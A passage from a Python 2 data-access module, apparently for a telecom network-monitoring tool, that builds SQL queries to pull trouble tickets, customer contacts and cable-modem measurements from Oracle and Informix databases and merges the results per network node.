> 1000:\r\n table = TEMP_TABLE + str(int(time.time() * 1000000) + random.randrange(1000))\r\n _create_temp_table(oracle_db, table, nodes)\r\n nodessql = _fill_nodessql(static_nodessql, nodes, table)\r\n static_sql = static_sql + nodessql\r\n static_sql = static_sql.format(start=static_interval[0], stop=static_interval[1])\r\n static_data = oracle_db.executeSQL(static_sql)\r\n if len(nodes) > 1000:\r\n _delete_temp_table(oracle_db, table)\r\n _map_tuple_to_tuples(static_data, data_format)\r\n\r\n if live_interval:\r\n logger.info('Fetching from live database.')\r\n if nodes != 'all' and len(nodes) <= 1000:\r\n nodessql = 
_fill_nodessql(live_nodessql, nodes)\r\n            live_sql = live_sql + nodessql\r\n        live_sql = live_sql.format(region='{region}', start=live_interval[0], stop=live_interval[1])\r\n        live_data = _fetch_with_spiegel(live_sql, kind='process')\r\n        if len(nodes) > 1000:\r\n            logger.info('Filtering nodes.')\r\n            nodeset = set([node.name for node in nodes])\r\n            live_data = [i for i in live_data if i[-1] in nodeset]\r\n        _map_tuple_to_tuples(live_data, data_format, dates=[5, 6, 7, 8, 9, 10, -2, -3])\r\n\r\n    data = static_data + live_data\r\n    nodes, data = _bin_data_to_nodes(data)\r\n    return nodes, data\r\n\r\n\r\ndef get_mgt_tickets(t_interval, nodes):\r\n    \"\"\"\r\n    only update static table when t_interval[1] > datetime.now() - 1 Min\r\n    \"\"\"\r\n    from updateroutine import TicketsSQLUpdate\r\n\r\n    static_sql = u\"\"\"\r\n    SELECT a_auftrnr as nr\r\n        ,a_auftragseinheit_id AS id\r\n        ,a_bearbeitungszustand AS zustand\r\n        ,a_auftragsklasse AS klasse\r\n        ,a_dienstkategorie AS dienst\r\n        ,a_annahmezeitpunkt AS annahme\r\n        ,a_abschlusszeitpunkt AS abschluss\r\n        ,A_SOLLTERMIN_VON AS soll_von\r\n        ,A_SOLLTERMIN_BIS AS soll_bis\r\n        ,A_STOERUNG_VON AS stoer_von\r\n        ,A_STOERUNG_BIS AS stoer_bis\r\n        ,trim(a_auftragsbeschreibung_st1) AS st1\r\n        ,trim(a_auftragsbeschreibung_st2) AS st2\r\n        ,ST3_ST3_AUFTRBESCHREIBUNG_MAX AS st3_st3\r\n        ,ST3_ZUS_AUFTRBESCHREIBUNG_MAX AS st3_zus\r\n        ,NULL AS bemerkung\r\n        ,REF_FEHLERURSACHE AS fehler\r\n        ,REF_ABSCHLUSSERGEBNIS AS ergebnis\r\n        ,A_AUFTRAGSART AS AUFTRAGSART\r\n        ,A_ORGETYP AS ORGETYP\r\n        ,A_NETZEBENE as NE\r\n        ,a_auftrag_id AS value\r\n        ,A_STOERUNG_VON AS starttime\r\n        ,CASE\r\n            WHEN A_STOERUNG_BIS IS NULL\r\n            THEN a_abschlusszeitpunkt\r\n            ELSE A_STOERUNG_BIS\r\n            END AS stoptime\r\n        ,'VRP R' || region || ' ' || an_bk_netzelem_id AS node_name\r\nFROM netcam_tickets\r\nWHERE a_auftragsklasse IN (\r\n        'CH'\r\n        ,'SD'\r\n        ,'SM'\r\n        ,'SX'\r\n        )\r\n    AND A_STOERUNG_VON >= TO_DATE('{start}', 'dd.mm.yyyy hh24:mi:ss')\r\n    AND (\r\n        CASE\r\n            WHEN A_STOERUNG_BIS IS NULL\r\n            THEN a_abschlusszeitpunkt\r\n            ELSE A_STOERUNG_BIS\r\n            END IS NULL\r\n        OR CASE\r\n            WHEN A_STOERUNG_BIS IS NULL\r\n            THEN a_abschlusszeitpunkt\r\n            ELSE A_STOERUNG_BIS\r\n            END < TO_DATE('{stop}', 'dd.mm.yyyy hh24:mi:ss')\r\n        )\r\n    AND an_bk_netzelem_id IS NOT NULL\r\n    AND a_bearbeitungszustand != 'st'\r\n    \"\"\"\r\n    static_nodessql = \"AND 'VRP R' || region || ' ' || an_bk_netzelem_id in ({nodes})\"\r\n\r\n    data_format = Ticketdata\r\n\r\n    static_interval = [t_interval[0].strftime(\"%d.%m.%Y %H:%M:%S\"),\r\n                       t_interval[1].strftime(\"%d.%m.%Y %H:%M:%S\")]\r\n\r\n    oracle_db = oracle.Oracle()\r\n    if t_interval[1] > datetime.datetime.now() - datetime.timedelta(seconds=60):\r\n        try:\r\n            logger.debug('Update static database.')\r\n            TicketsSQLUpdate().update_tickets(oracle_db)\r\n            logger.debug('Fetching from static database.')\r\n        except:\r\n            logger.warning(alertTexter.alertText(13010))\r\n\r\n    table = None\r\n    if nodes != 'all':\r\n        nodes = [node for node in nodes if node.name[0:3] == \"VRP\"]\r\n        if len(nodes) > 1000:\r\n            table = TEMP_TABLE + str(int(time.time() * 1000000) + random.randrange(1000))\r\n            _create_temp_table(oracle_db, table, nodes)\r\n        nodessql = _fill_nodessql(static_nodessql, nodes, table)\r\n        static_sql = static_sql + nodessql\r\n    static_sql = static_sql.format(start=static_interval[0], stop=static_interval[1])\r\n    data = oracle_db.executeSQL(static_sql)\r\n    if len(nodes) > 1000:\r\n        _delete_temp_table(oracle_db, table)\r\n    _map_tuple_to_tuples(data, data_format)\r\n\r\n    nodes, data = _bin_data_to_nodes(data)\r\n    
return nodes, data\r\n\r\n\r\ndef get_sk_tickets(t_interval, nodes):\r\n \"\"\"\r\n only update static table when t_interval[1] > datetime.now() - 1 Min\r\n \"\"\"\r\n from updateroutine import TicketsSQLUpdate\r\n\r\n static_sql = u\"\"\"\r\nSELECT a_auftrnr as nr\r\n ,a_auftragseinheit_id AS id\r\n ,a_bearbeitungszustand AS zustand\r\n ,a_auftragsklasse AS klasse\r\n ,a_dienstkategorie AS dienst\r\n ,a_annahmezeitpunkt AS annahme\r\n ,a_abschlusszeitpunkt AS abschluss\r\n ,A_SOLLTERMIN_VON AS soll_von\r\n ,A_SOLLTERMIN_BIS AS soll_bis\r\n ,A_STOERUNG_VON AS stoer_von\r\n ,A_STOERUNG_BIS AS stoer_bis\r\n ,trim(a_auftragsbeschreibung_st1) AS st1\r\n ,trim(a_auftragsbeschreibung_st2) AS st2\r\n ,ST3_ST3_AUFTRBESCHREIBUNG_MAX AS st3_st3\r\n ,ST3_ZUS_AUFTRBESCHREIBUNG_MAX AS st3_zus\r\n ,NULL AS bemerkung\r\n ,REF_FEHLERURSACHE AS fehler\r\n ,REF_ABSCHLUSSERGEBNIS AS ergebnis\r\n ,A_AUFTRAGSART AS AUFTRAGSART\r\n ,A_ORGETYP AS ORGETYP\r\n ,A_NETZEBENE as NE\r\n ,a_auftrag_id AS value\r\n ,A_STOERUNG_VON AS starttime\r\n ,CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END AS stoptime\r\n ,'Kunde ' || trim(kp_kundennummer) || ' - ' || a_grundstueck_id AS node_name\r\nFROM netcam_tickets\r\nWHERE a_auftragsklasse in ('SK')\r\n AND A_STOERUNG_VON >= TO_DATE('{start}', 'dd.mm.yyyy hh24:mi:ss')\r\n AND (\r\n CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END IS NULL\r\n OR CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END < TO_DATE('{stop}', 'dd.mm.yyyy hh24:mi:ss')\r\n )\r\n AND a_bearbeitungszustand != 'st'\r\n \"\"\"\r\n static_nodessql = \"AND 'Kunde ' || trim(kp_kundennummer) || ' - ' || a_grundstueck_id in ({nodes})\"\r\n\r\n data_format = Ticketdata\r\n\r\n static_interval = [t_interval[0].strftime(\"%d.%m.%Y %H:%M:%S\"),\r\n t_interval[1].strftime(\"%d.%m.%Y %H:%M:%S\")]\r\n oracle_db = oracle.Oracle()\r\n if (t_interval[1] > (datetime.datetime.now() - datetime.timedelta(seconds=60))):\r\n try:\r\n logger.debug('Update static database.')\r\n TicketsSQLUpdate().update_tickets(oracle_db)\r\n logger.debug('Fetching from static database.')\r\n except:\r\n logger.warning(alertTexter.alertText(13010))\r\n\r\n table = None\r\n if nodes != 'all':\r\n nodes = [node for node in nodes if node.name[0:3] == \"Kun\"]\r\n if len(nodes) > 1000:\r\n table = TEMP_TABLE + str(int(time.time() * 1000000) + random.randrange(1000))\r\n _create_temp_table(oracle_db, table, nodes)\r\n nodessql = _fill_nodessql(static_nodessql, nodes, table)\r\n static_sql = static_sql + nodessql\r\n static_sql = static_sql.format(start=static_interval[0], stop=static_interval[1])\r\n data = oracle_db.executeSQL(static_sql)\r\n if len(nodes) > 1000:\r\n _delete_temp_table(oracle_db, table)\r\n _map_tuple_to_tuples(data, data_format)\r\n\r\n nodes, data = _bin_data_to_nodes(data)\r\n return nodes, data\r\n\r\n\r\ndef get_customer_contacts(t_interval, nodes):\r\n \"\"\"\r\n only update static table when t_interval[1] > datetime.now() - 1 Min\r\n \"\"\"\r\n from updateroutine import TicketsSQLUpdate\r\n\r\n static_sql = u\"\"\"\r\nSELECT a_auftrag_id AS value\r\n ,a_annahmezeitpunkt AS starttime\r\n ,a_annahmezeitpunkt AS stoptime\r\n ,'Kunde ' || trim(kp_kundennummer) || ' - ' || a_grundstueck_id AS node_name\r\nFROM netcam_tickets\r\nWHERE a_auftragsklasse = 'SK'\r\n AND a_dienstkategorie <> 'NTF'\r\n AND a_annahmezeitpunkt >= To_date('{start}', 'dd.mm.yyyy hh24:mi:ss')\r\n AND 
a_annahmezeitpunkt < To_date('{stop}', 'dd.mm.yyyy hh24:mi:ss')\r\n \"\"\"\r\n static_nodessql = \"AND 'Kunde ' || trim(kp_kundennummer) || ' - ' || a_grundstueck_id in ({nodes})\"\r\n\r\n data_format = lambda: None\r\n\r\n static_interval = [t_interval[0].strftime(\"%d.%m.%Y %H:%M:%S\"),\r\n t_interval[1].strftime(\"%d.%m.%Y %H:%M:%S\")]\r\n oracle_db = oracle.Oracle()\r\n\r\n if t_interval[1] > datetime.datetime.now() - datetime.timedelta(seconds=60):\r\n try:\r\n logger.debug('Update static database.')\r\n TicketsSQLUpdate().update_tickets(oracle_db)\r\n logger.debug('Fetching from static database.')\r\n except:\r\n logger.warning(alertTexter.alertText(13010))\r\n table = None\r\n if nodes != 'all':\r\n nodes = [node for node in nodes if node.name[0:3] == 'Kun']\r\n if len(nodes) > 1000:\r\n table = TEMP_TABLE + str(int(time.time() * 1000000) + random.randrange(1000))\r\n _create_temp_table(oracle_db, table, nodes)\r\n nodessql = _fill_nodessql(static_nodessql, nodes, table)\r\n static_sql = static_sql + nodessql\r\n static_sql = static_sql.format(start=static_interval[0], stop=static_interval[1])\r\n data = oracle_db.executeSQL(static_sql)\r\n if len(nodes) > 1000:\r\n _delete_temp_table(oracle_db, table)\r\n _map_tuple_to_tuples(data, data_format)\r\n\r\n nodes, data = _bin_data_to_nodes(data)\r\n return nodes, data\r\n\r\n\r\ndef get_auftrag_id(a_auftrag_ids):\r\n\r\n sql = \"select a_auftrnr, a_auftrag_id from ta_auftrag_kopfdaten where a_auftrag_id in ({})\"\r\n sql = sql.format(\",\".join([str(i) for i in a_auftrag_ids]))\r\n data = _fetch_with_spiegel(sql, kind='process')\r\n return data\r\n\r\n\r\ndef get_unbundeled_fieldtickets(t_interval):\r\n sql = \"\"\"\r\nSELECT a_auftrnr as nr\r\n ,a_auftragseinheit_id AS id\r\n ,a_bearbeitungszustand AS zustand\r\n ,a_auftragsklasse AS klasse\r\n ,a_dienstkategorie AS dienst\r\n ,a_annahmezeitpunkt AS annahme\r\n ,a_abschlusszeitpunkt abschluss\r\n ,A_SOLLTERMIN_VON AS soll_von\r\n ,A_SOLLTERMIN_BIS AS soll_bis\r\n ,A_STOERUNG_VON AS stoer_von\r\n ,A_STOERUNG_BIS AS stoer_bis\r\n ,trim(a_auftragsbeschreibung_st1) AS st1\r\n ,trim(a_auftragsbeschreibung_st2) AS st2\r\n ,trim(a_auftragsbeschreibung_st3) AS st3_st3\r\n ,trim(st3_zus.a_auftragsbeschreibung) AS st3_zus\r\n ,NULL::VARCHAR AS bemerkung\r\n ,NULL::VARCHAR AS fehler\r\n ,NULL::VARCHAR AS ergebnis\r\n ,NULL::VARCHAR AS auftragsart\r\n ,NULL::VARCHAR as orgetyp\r\n ,NULL::VARCHAR as NE\r\n ,tak.a_auftrag_id AS value\r\n ,A_STOERUNG_VON AS starttime\r\n ,CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END AS stoptime\r\n ,'Kunde ' || trim(tkzp.a_kundennummer) || ' - ' || a_grundstueck_id AS node_name\r\nFROM (\r\n SELECT *\r\n FROM ta_auftrag_kopfdaten\r\n WHERE a_annahmezeitpunkt >= TO_DATE(\"{start}\", \"%d.%m.%Y %H:%M:%S\")\r\n AND a_annahmezeitpunkt < TO_DATE(\"{stop}\", \"%d.%m.%Y %H:%M:%S\")\r\n AND a_auftragsklasse IN ('SK')\r\n AND (a_orgetyp = 'P' OR a_plangr_kb = 'TSSD3')\r\n AND a_auftragsart = 'Aufgabe'\r\n AND a_auftragseinheit_id IS NULL\r\n AND a_einzelauftrag_kz = 'N'\r\n ) tak\r\nLEFT JOIN (\r\n SELECT base.a_auftrag_id\r\n ,trim(st3.A_AUFTRAGSBESCHREIBUNG) AS A_AUFTRAGSBESCHREIBUNG\r\n FROM (\r\n SELECT a_auftrag_id\r\n ,max(A_AUFTRAGSBESCHREIBUNG_ST3_ID) AS maxid\r\n FROM ta_auftrag_beschreibung_st3\r\n WHERE a_kenner = 'ZUS'\r\n AND a_modifiziert_zeitpunkt >= TO_DATE(\"{start}\", \"%d.%m.%Y %H:%M:%S\")\r\n GROUP BY a_auftrag_id\r\n ) base\r\n LEFT JOIN ta_auftrag_beschreibung_st3 st3\r\n ON base.a_auftrag_id = 
st3.a_auftrag_id\r\n AND base.maxid = st3.A_AUFTRAGSBESCHREIBUNG_ST3_ID\r\n ) st3_zus\r\n ON tak.a_auftrag_id = st3_zus.a_auftrag_id\r\nLEFT JOIN (\r\n SELECT a_auftrag_id\r\n ,max(a_kundennummer) a_kundennummer\r\n FROM ta_kauf_zu_person\r\n WHERE a_person_typ_kb = 'KUN'\r\n AND a_modifiziert_zeitpunkt >= TO_DATE(\"{start}\", \"%d.%m.%Y %H:%M:%S\")\r\n GROUP BY a_auftrag_id\r\n ) tkzp\r\n ON tak.a_auftrag_id = tkzp.a_auftrag_id\r\n \"\"\".format(start=t_interval[0].strftime(\"%d.%m.%Y %H:%M:%S\"),\r\n stop=t_interval[1].strftime(\"%d.%m.%Y %H:%M:%S\"))\r\n\r\n data = _fetch_with_spiegel(sql, kind='process')\r\n logger.debug('Fetched {} unbundeled fieldtickets.'.format(len(data)))\r\n _map_tuple_to_tuples(data, Ticketdata, dates=[5, 6, 7, 8, 9, 10, -2, -3])\r\n return data\r\n\r\n\r\ndef _map_tuple_to_tuples(data, data_format, dates=[]):\r\n \"\"\"\r\n Convert incoming tuples of data to :py:class:`.Datapoint` containing an optional data_format as data.\r\n\r\n :param data: The input data.\r\n :param data_format: the Namedtuple to use for additional data.\r\n :param dates: a list of indices that should be converted to datetime format\r\n\r\n Usage::\r\n\r\n >>> data = (1, datetime.datetime(2013, 1, 1), datetime.datetime(2013, 1, 2), \"MAC 12121211\")\r\n >>> _map_tuple_to_tuples(data, lambda: None)\r\n >>> data\r\n [Datapoint(data=None, value=1, starttime=datetime.datetime(2013, 1, 1, 0, 0), \\\r\n stoptime=datetime.datetime(2013, 1, 2, 0, 0), node_name='MAC 12121211')]\r\n \"\"\"\r\n deletes = []\r\n for i, entry in enumerate(data):\r\n if dates:\r\n entry = list(entry)\r\n for j in dates:\r\n if entry[j]:\r\n entry[j] = datetime.datetime.strptime(entry[j], '%Y-%m-%d %H:%M:%S.%f')\r\n if all([entry[j] is not None for j in [-4, -3, -1]]):\r\n data[i] = Datapoint(data_format(*entry[:-4]), *entry[-4:])\r\n else:\r\n deletes.append(i)\r\n for entry in sorted(deletes, reverse=True):\r\n del data[entry]\r\n\r\n\r\ndef _map_dict_to_tuples(data, data_format):\r\n deletes = []\r\n for i, entry in enumerate(data):\r\n basetuple = []\r\n for key in ['value', 'starttime', 'stoptime', 'node_name']:\r\n basetuple.append(entry[key])\r\n del entry[key]\r\n if all([j is not None for j in basetuple]):\r\n data[i] = Datapoint(*basetuple, data=data_format(**entry))\r\n else:\r\n deletes.append(i)\r\n for entry in sorted(deletes, reverse=True):\r\n del data[entry]\r\n\r\n\r\ndef _fetch_with_spiegel(sql, assoc=False, region='all', kind='data'):\r\n if kind == 'data':\r\n delphi_regions = DELPHI_REGIONS_DATA\r\n delphi_connstring = DELPHI_CONNSTRING_DATA\r\n else:\r\n delphi_regions = DELPHI_REGIONS_PROCESS\r\n delphi_connstring = DELPHI_CONNSTRING_PROCESS\r\n data = []\r\n logger.debug(u'Executing SQL on Spiegel :{}'.format(sql))\r\n if region == 'all':\r\n regions = delphi_regions.items()\r\n else:\r\n regions = [[region, delphi_regions[region]]]\r\n for region, params in regions:\r\n if '{region}' in sql:\r\n tempsql = sql.format(region=region)\r\n logger.debug(u'Executing SQL on Spiegel :{}'.format(tempsql))\r\n else:\r\n tempsql = sql\r\n tempdata = []\r\n logger.info('Fetching Region {}'.format(region))\r\n conn = ibm_db.connect(delphi_connstring.format(*params), \"\", \"\")\r\n stmt = ibm_db.prepare(conn, tempsql)\r\n try:\r\n ibm_db.execute(stmt)\r\n except:\r\n logger.exception('Informix Database exception caught: {}'.format(sys.exc_info()[1]))\r\n logger.error('SQL: \\n{}'.format(tempsql))\r\n return data\r\n if assoc:\r\n row = ibm_db.fetch_assoc(stmt)\r\n else:\r\n row = ibm_db.fetch_tuple(stmt)\r\n 
while row:\r\n tempdata.append(row)\r\n if assoc:\r\n row = ibm_db.fetch_assoc(stmt)\r\n else:\r\n row = ibm_db.fetch_tuple(stmt)\r\n ibm_db.free_stmt(stmt)\r\n ibm_db.close(conn)\r\n logger.debug('Fetched {} rows.'.format(len(tempdata)))\r\n data.extend(tempdata)\r\n return data\r\n\r\n\r\ndef _fill_nodessql(nodessql, nodes, table=None):\r\n if nodes == 'all':\r\n return ''\r\n if table:\r\n nodessql = nodessql.format(nodes=\"Select nodename from {}\".format(table))\r\n else:\r\n nodestring = \"','\".join([node if (isinstance(node, str) or isinstance(node, unicode))\r\n else str(node.name) if (isinstance(node.name, int) or isinstance(node.name, float))\r\n else node.name\r\n for node in nodes])\r\n nodestring = \"'{}'\".format(nodestring)\r\n nodessql = nodessql.format(nodes=nodestring, region='{region}')\r\n return nodessql\r\n\r\n\r\ndef get_raw_data(topology, data_kinds, t_interval, nodes='all'):\r\n \"\"\"\r\n Translate request into sql and return the table as result.\r\n\r\n :param data_kinds: kind of data\r\n :type data_kinds: string / tuple of strings\r\n :param t_interval: time intervals\r\n :type t_interval: tuple of datetime\r\n :param nodes: node id, or 'all' (default) if no nodes should be excluded\r\n :type nodes: tuple of integers / string\r\n :returns: data as imported with sql\r\n :rtype: tuples of named tuples\r\n \"\"\"\r\n\r\n unordered_data = []\r\n unordered_nodes = []\r\n logger.info('Fetching raw data.')\r\n\r\n if (data_kinds == 'all'):\r\n data_kinds = DATA_DICT.keys()\r\n\r\n datapipes = []\r\n\r\n def _parralel_data_fetch(queue, data_kind, t_interval, nodes):\r\n queue.put(DATA_DICT[data_kind](t_interval, nodes))\r\n logger.info('Got raw data of data kind: {}'.format(data_kind))\r\n\r\n for data_kind in data_kinds:\r\n logger.info('Fetching raw data of data kind: {}'.format(data_kind))\r\n que = Queue.Queue()\r\n thread.start_new_thread(_parralel_data_fetch, (que, data_kind, t_interval, nodes))\r\n datapipes.append(que)\r\n\r\n for que in datapipes:\r\n data_nodes, data = que.get()\r\n unordered_nodes.append(data_nodes)\r\n unordered_data.append(data)\r\n\r\n if nodes == 'all':\r\n nodes = []\r\n [nodes.extend(i) for i in unordered_nodes]\r\n nodes = list(set(nodes))\r\n else:\r\n nodes = [node.name for node in nodes]\r\n\r\n logger.info('Merging the various data kinds.')\r\n result_data = _merge_data_by_nodes(nodes, data_kinds, unordered_nodes, unordered_data)\r\n\r\n logger.info('Translating node names.')\r\n nodes = [topology.name2node.get(node) for node in nodes]\r\n\r\n logger.info('Dropping unknown nodes.')\r\n deletelist = [i for i in range(len(nodes)) if nodes[i] is None]\r\n for i in sorted(deletelist, reverse=True):\r\n del nodes[i]\r\n del result_data[i]\r\n logger.info('Dropped {} nodes.'.format(len(deletelist)))\r\n\r\n logger.info('Finished fetching raw data.')\r\n data_kinds = _get_gaps(data_kinds, t_interval)\r\n return nodes, data_kinds, result_data\r\n\r\n\r\ndef _split_live_static(starttime, stoptime, live_period):\r\n startlive = datetime.datetime.now() - live_period\r\n static_interval = [min(starttime, startlive).strftime(\"%d.%m.%Y %H:%M:%S\"),\r\n min(stoptime, startlive).strftime(\"%d.%m.%Y %H:%M:%S\")]\r\n live_interval = [max(starttime, startlive).strftime(\"%d.%m.%Y %H:%M:%S\"),\r\n max(stoptime, startlive).strftime(\"%d.%m.%Y %H:%M:%S\")]\r\n if static_interval[0] == static_interval[1]:\r\n static_interval = []\r\n if live_interval[0] == live_interval[1]:\r\n live_interval = []\r\n return static_interval, live_interval\r\n\r\n\r\ndef 
_create_temp_table(db, table, nodes):\r\n    db.executeSQL(TEMP_TABLE_CREATE_SQL.format(table))\r\n    db.insert_data(table, ['nodename'], [[node] if (isinstance(node, str) or isinstance(node, unicode))\r\n                                         else [node.name] for node in nodes])\r\n    db.executeSQL(TEMP_TABLE_IDX_SQL.format(table, table))\r\n\r\n\r\ndef _delete_temp_table(db, table):\r\n    db.executeSQL(\"drop table {}\".format(table))\r\n\r\n\r\ndef _bin_data_to_nodes(data):\r\n    binned_data = collections.defaultdict(list)\r\n    if data:\r\n        logger.info('Binning data to nodes.')\r\n        for entry in data:\r\n            binned_data[entry.node_name].append(entry)\r\n    return binned_data.keys(), binned_data.values()\r\n\r\n\r\ndef _merge_data_by_nodes(nodes, data_kinds, unordered_nodes, unordered_data):\r\n    \"\"\"\r\n    Merge various data kinds per node to fit the return structure of data[node][data_kind][data_element].\r\n\r\n    :param nodes: A list of node names of the final sample.\r\n    :param data_kinds: A list of data_kinds.\r\n    :param unordered_nodes: A list of nodes per data_kind.\r\n    :param unordered_data: A list of data kind per unordered_node.\r\n\r\n    :returns: A 3d list with structure data[node][data_kind][data_element].\r\n    \"\"\"\r\n    data = [[[] for _ in data_kinds] for _ in nodes]\r\n    nodesdict = {node: i for i, node in enumerate(nodes)}\r\n    for i in range(len(data_kinds)):\r\n        for j, node in enumerate(unordered_nodes[i]):\r\n            k = nodesdict[node]\r\n            data[k][i] = unordered_data[i][j]\r\n    return data\r\n\r\n\r\ndef _get_gaps(data_kinds, t_interval):\r\n    \"\"\"\r\n    Fetch gaps in the data.\r\n\r\n    :param data_kinds: A list of data kinds for which to fetch gaps.\r\n    :param t_interval: The time interval for which to fetch gaps.\r\n\r\n    :returns: A list of data kinds of format [data_kind, completeness fraction, [gap start, stop tuples]]\r\n    \"\"\"\r\n    sql = \"\"\"\r\n    select * from {} where datakind in ('{}')\r\n    and not (to_date('{}','dd.mm.yyyy hh24:mi:ss') > gapend and to_date('{}','dd.mm.yyyy hh24:mi:ss') > gapend)\r\n    and not (to_date('{}','dd.mm.yyyy hh24:mi:ss') < gapstart and to_date('{}','dd.mm.yyyy hh24:mi:ss') < gapstart)\r\n    \"\"\".format(GAPS_TABLE, \"', '\".join(data_kinds),\r\n               t_interval[0].strftime('%d.%m.%Y %H:%M:%S'),\r\n               t_interval[1].strftime('%d.%m.%Y %H:%M:%S'),\r\n               t_interval[0].strftime('%d.%m.%Y %H:%M:%S'),\r\n               t_interval[1].strftime('%d.%m.%Y %H:%M:%S'))\r\n\r\n    oracle_db = oracle.Oracle()\r\n    data = oracle_db.executeSQL(sql)\r\n\r\n    totaltime = (t_interval[1] - t_interval[0]).total_seconds()\r\n    gaptime = [0 for _ in data_kinds]\r\n    gapsdict = {datakind: [] for datakind in data_kinds}\r\n    for entry in data:\r\n        gapsdict[entry[0]].append((entry[1], entry[2]))\r\n\r\n    extended_datakinds = [[i, 1, []] for i in data_kinds]\r\n\r\n    for i, datakind in enumerate(data_kinds):\r\n        for gapstart, gapend in gapsdict[datakind]:\r\n            extended_datakinds[i][2].append((gapstart, gapend))\r\n            if gapstart < t_interval[0]:\r\n                gapstart = t_interval[0]\r\n            if gapend > t_interval[1]:\r\n                gapend = t_interval[1]\r\n            gaptime[i] += (gapend - gapstart).total_seconds()\r\n\r\n    for i in range(len(data_kinds)):\r\n        extended_datakinds[i][1] = (totaltime - gaptime[i]) / float(totaltime)\r\n\r\n    del oracle_db\r\n\r\n    return extended_datakinds\r\n\r\n\r\ndef update(data_kind, data):\r\n    \"\"\"\r\n    Write input data to local DB.\r\n\r\n    :param data_kind: kind of data\r\n    :type data_kind: string\r\n    :param data: data to be inserted\r\n    :type data: tuples of datapoints\r\n    :returns: # successful datapoints inserted\r\n    :rtype: integer\r\n    \"\"\"\r\n    pass\r\n\r\n\r\ndef 
wrapper_get_proviso_data(columnselect):\r\n def get_proviso_data(t_interval, nodes):\r\n columnname = columnselect\r\n static_sql = u\"\"\"select\r\n {col} as value,\r\n dte as starttime,\r\n dte as stoptime,\r\n 'MAC ' || mac as node_name\r\n from netcam_cm_measurements\r\n where dte >= TO_DATE('{start}', 'dd.mm.yyyy hh24:mi:ss')\r\n and dte <= TO_DATE('{end}', 'dd.mm.yyyy hh24:mi:ss')\r\n \"\"\"\r\n # use 'dte in ()' to use the bitmap index on dte.\r\n\r\n static_nodessql = \"AND 'MAC ' || mac in ({nodes})\"\r\n data_format = lambda: None\r\n oracle_db = oracle.Oracle()\r\n\r\n static_interval = [t_interval[0].strftime(\"%d.%m.%Y %H:%M:%S\"),\r\n t_interval[1].strftime(\"%d.%m.%Y %H:%M:%S\")]\r\n static_sql = static_sql.format(start=static_interval[0], end=static_interval[1], col=columnname)\r\n \r\n table = None\r\n if nodes != 'all':\r\n nodes = [node for node in nodes if node.name[0:3] == 'MAC']\r\n if len(nodes) > 1000:\r\n table = TEMP_TABLE + str(int(time.time() * 1000000) + random.randrange(1000))\r\n _create_temp_table(oracle_db, table, nodes)\r\n nodessql = _fill_nodessql(static_nodessql, nodes, table)\r\n static_sql = static_sql + nodessql\r\n \r\n data = oracle_db.executeSQL(static_sql)\r\n if len(nodes) > 1000:\r\n _delete_temp_table(oracle_db, table)\r\n _map_tuple_to_tuples(data, data_format)\r\n\r\n nodes, data = _bin_data_to_nodes(data)\r\n return nodes, data\r\n\r\n return get_proviso_data\r\n\r\n\r\ndef wrapper_t3_t4_timeouts(columnselect):\r\n #columnselect can be T3_COUNT or T4_COUNT\r\n def get_timeouts(t_interval, nodes):\r\n columnname = columnselect\r\n static_sql = u\"\"\"select\r\n {col} as value,\r\n epoch2date(dte_date) as starttime,\r\n epoch2date(dte_date) as stoptime,\r\n 'MAC ' || mac as node_name\r\n from T3T4_TIMEOUTS\r\n where epoch2date(DTE_DATE) >= TO_DATE('{start}', 'dd.mm.yyyy hh24:mi:ss')\r\n and epoch2date(DTE_DATE) <= TO_DATE('{end}', 'dd.mm.yyyy hh24:mi:ss')\r\n \"\"\"\r\n # use 'dte in ()' to use the bitmap index on dte.\r\n\r\n static_nodessql = \"AND 'MAC ' || mac in ({nodes})\"\r\n data_format = lambda: None\r\n oracle_db = oracle.Oracle()\r\n\r\n static_interval = [t_interval[0].strftime(\"%d.%m.%Y %H:%M:%S\"),\r\n t_interval[1].strftime(\"%d.%m.%Y %H:%M:%S\")]\r\n static_sql = static_sql.format(start=static_interval[0], end=static_interval[1], col=columnname)\r\n table = None\r\n if nodes != 'all':\r\n nodes = [node for node in nodes if node.name[0:3] == 'MAC']\r\n if len(nodes) > 1000:\r\n table = TEMP_TABLE + str(int(time.time() * 1000000) + random.randrange(1000))\r\n _create_temp_table(oracle_db, table, nodes)\r\n nodessql = _fill_nodessql(static_nodessql, nodes, table)\r\n static_sql = static_sql + nodessql\r\n data = oracle_db.executeSQL(static_sql)\r\n if len(nodes) > 1000:\r\n _delete_temp_table(oracle_db, table)\r\n _map_tuple_to_tuples(data, data_format)\r\n\r\n nodes, data = _bin_data_to_nodes(data)\r\n return nodes, data\r\n return get_timeouts\r\n\r\n\r\ndef get_last_onoff_events(t_interval, node):\r\n try:\r\n nodes, last_events = DATA_DICT['onoff'](t_interval, [node])\r\n if last_events:\r\n node_last_events = last_events[0]\r\n else:\r\n logger.error('ONOFF rawdata format invalid, returning None')\r\n return None\r\n node_last_events.sort(key=lambda x: x.starttime, reverse=True)\r\n logger.debug('Found data.')\r\n return node_last_events\r\n except:\r\n logger.error('Error last onoff events, returning none')\r\n return None\r\n\r\n\r\nDATA_DICT = {'onoff': get_onoff,\r\n 'mgt_tickets': get_mgt_tickets,\r\n 'sk_tickets': 
